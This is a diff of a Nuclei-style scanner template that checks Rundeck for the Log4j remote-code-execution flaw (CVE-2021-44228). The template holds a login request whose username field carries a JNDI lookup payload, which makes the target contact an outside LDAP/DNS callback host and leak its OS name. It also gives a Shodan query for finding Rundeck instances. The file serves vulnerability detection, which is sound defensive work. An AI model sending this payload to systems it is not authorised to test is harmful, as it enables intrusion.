vulnerabilities/other/rundeck-log4j.yaml (before)
id: rundeck-log4j

info:
  name: Rundeck - Remote Code Execution (Apache Log4j)
  author: DhiyaneshDK
  severity: critical
  description: Rundeck is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://docs.rundeck.com/docs/history/CVEs/log4j.html
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-917
  metadata:
    shodan-query: title:"Rundeck"
    verified: "true"
  tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast

requests:
  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{BaseURL}}/user/login

        j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output

# Enhanced by md on 2022/10/05

vulnerabilities/other/rundeck-log4j.yaml (after)
id: rundeck-log4j

info:
  name: Rundeck - Remote Code Execution (Apache Log4j)
  author: DhiyaneshDK
  severity: critical
  description: Rundeck is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://docs.rundeck.com/docs/history/CVEs/log4j.html
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
    shodan-query: title:"Rundeck"
    verified: "true"
  tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast

requests:
  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{BaseURL}}/user/login

        j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable

      - type: word
        part: location
        words:
          - '{{BaseURL}}/user/error'

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output

vulnerabilities/other/rundeck-log4j.yaml (diff)
@@ -13,7 +13,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
     cve-id: CVE-2021-44228
-    cwe-id: CWE-917
+    cwe-id: CWE-77
   metadata:
     shodan-query: title:"Rundeck"
     verified: "true"
@@ -43,6 +43,11 @@ requests:
         regex:
           - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
 
+      - type: word
+        part: location
+        words:
+          - '{{BaseURL}}/user/error'
+
     extractors:
       - type: kval
         kval:
@@ -53,5 +58,3 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
-
-# Enhanced by md on 2022/10/05
